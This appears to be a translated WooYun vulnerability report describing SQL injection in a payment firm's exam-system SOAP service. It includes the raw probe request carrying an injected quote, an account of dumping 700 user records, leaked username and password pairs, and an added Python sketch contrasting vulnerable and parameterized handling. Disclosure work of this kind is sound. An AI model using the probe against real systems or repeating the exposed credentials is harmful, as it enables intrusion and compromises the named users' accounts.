SOAP injection in the exam system of a large third-party payment institution exposes user passwords (DBA privileges + 9 databases)

ID: 221978
URL: http://www.wooyun.org/bug.php?action=view&id=221978
Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling
Title: SOAP injection in the exam system of a large third-party payment institution exposes user passwords (DBA privileges + 9 databases)
Vulnerability type: SQL injection
Vendor: 银联商务 (UnionPay Merchant Services)
White hat: 0x 80
Submitted: 2016-06-23 10:41:00
Published: 2016-06-27 15:05:00
Fixed: (not set)
Confirmed: 0000-00-00 00:00:00
Confirm Spend: -1
Tags: excessive database account privileges, MySQL injection techniques
Followers: 0
Bookmarks: 0
White hat rating
White hat self-assessed rank: 20
Vendor rating
Vendor rank: 0
Summary
SOAP injection in the exam system of a large third-party payment institution exposes user passwords (DBA privileges + 9 databases)
Details

http://**.**.**.**/webservice/MuiltiExam.asmx?op=DeleteSendedKscj
http://**.**.**.**/webservice/MuiltiExam.asmx?wsdl
The SOAP interface is vulnerable to SQL injection: the p_KscjIDList parameter of the DeleteSendedKscj method is passed into a query unsanitised, and a single quote in it is enough to provoke a database error.

[screenshot: 捕获881.GIF]


[screenshot: 捕获88888.GIF]


POST /webservice/MuiltiExam.asmx HTTP/1.1
Host: **.**.**.**
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://**.**.**.**/DeleteSendedKscj"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance" xmlns:xsd="http://**.**.**.**/2001/XMLSchema" xmlns:soap="http://**.**.**.**/soap/envelope/">
<soap:Body>
<DeleteSendedKscj xmlns="http://**.**.**.**/">
<p_KscjIDList>'having</p_KscjIDList>
</DeleteSendedKscj>
</soap:Body>
</soap:Envelope>
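As an added illustration (not code from the report or from the vendor), the handler below models the DeleteSendedKscj method end to end: it extracts p_KscjIDList from a constructed copy of the probe request, the vulnerable path pastes the list into the SQL text the way the report implies, and the hardened path allow-lists integer ids and binds them as parameters so the same probe is rejected before it reaches the database. The service namespace, table name and rows are assumptions, since the report masks the host.

```python
import re
import sqlite3
import xml.etree.ElementTree as ET

NS = "http://example.invalid/"  # assumed: the report masks the real service namespace
SOAP = "http://schemas.xmlsoap.org/soap/envelope/"

# Constructed request mirroring the report's probe: a stray quote in p_KscjIDList.
PROBE_REQUEST = f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="{SOAP}"><soap:Body>
<DeleteSendedKscj xmlns="{NS}"><p_KscjIDList>'having</p_KscjIDList></DeleteSendedKscj>
</soap:Body></soap:Envelope>"""

def extract_id_list(soap_xml: str) -> str:
    """Return the raw p_KscjIDList text from a DeleteSendedKscj call."""
    root = ET.fromstring(soap_xml.encode("utf-8"))
    node = root.find(f".//{{{NS}}}DeleteSendedKscj/{{{NS}}}p_KscjIDList")
    return (node.text or "") if node is not None else ""

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the exam-result table the method deletes from."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE kscj (id INTEGER PRIMARY KEY, student TEXT)")
    db.executemany("INSERT INTO kscj VALUES (?, ?)", [(1, "a"), (2, "b"), (3, "c")])
    return db

def delete_vulnerable(db: sqlite3.Connection, raw_ids: str) -> int:
    """The pattern behind the report: the id list is pasted into the statement."""
    return db.execute(f"DELETE FROM kscj WHERE id IN ({raw_ids})").rowcount

def delete_hardened(db: sqlite3.Connection, raw_ids: str) -> int:
    """Allow-list each element as an integer, then bind one placeholder per id."""
    ids = [s.strip() for s in raw_ids.split(",") if s.strip()]
    if not ids or not all(re.fullmatch(r"\d{1,18}", s) for s in ids):
        raise ValueError("p_KscjIDList must be a comma-separated list of integer ids")
    marks = ",".join("?" * len(ids))
    return db.execute(f"DELETE FROM kscj WHERE id IN ({marks})", [int(s) for s in ids]).rowcount

def handle(db: sqlite3.Connection, soap_xml: str, hardened: bool) -> str:
    # Serve one request; the returned string is what the SOAP caller would observe.
    raw = extract_id_list(soap_xml)
    try:
        n = delete_hardened(db, raw) if hardened else delete_vulnerable(db, raw)
        return f"deleted {n}"
    except ValueError:
        return "rejected"  # never reaches the database
    except sqlite3.OperationalError as e:
        return f"sql error: {e}"  # the parser error an error-based probe looks for
```

A normal list such as "1, 3" deletes the same rows on both paths; only the hardened path turns the probe into a validation failure instead of a leaked database error.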


[screenshot: 捕获789.GIF]


Searching the database showed that all user passwords are stored in the StudentInfo table.
Dumped it straight away.
700 records in total.

[screenshot: 捕获99999.GIF]




Although the passwords are encrypted,
many weak passwords remain.
http://**.**.**.**/Login.aspx
A few examples picked at random:
jwang1 123456
chzhang 123456
cshhan 123456
daijianbei 123456
heli 123456

[screenshot: 捕获111.GIF]


[screenshot: 捕获98989.GIF]


POC

http://**.**.**.**/webservice/MuiltiExam.asmx?wsdl

Fix recommendation

Status history: 2016-06-23: details sent to the vendor, awaiting vendor handling
2016-06-27: the vendor chose to ignore the vulnerability; details disclosed to the public
Vendor response: None. Vulnerability Rank: 15 (WooYun rating)
Response details: Severity: no impact. Vendor ignored. Ignored at: 2016-06-27 15:05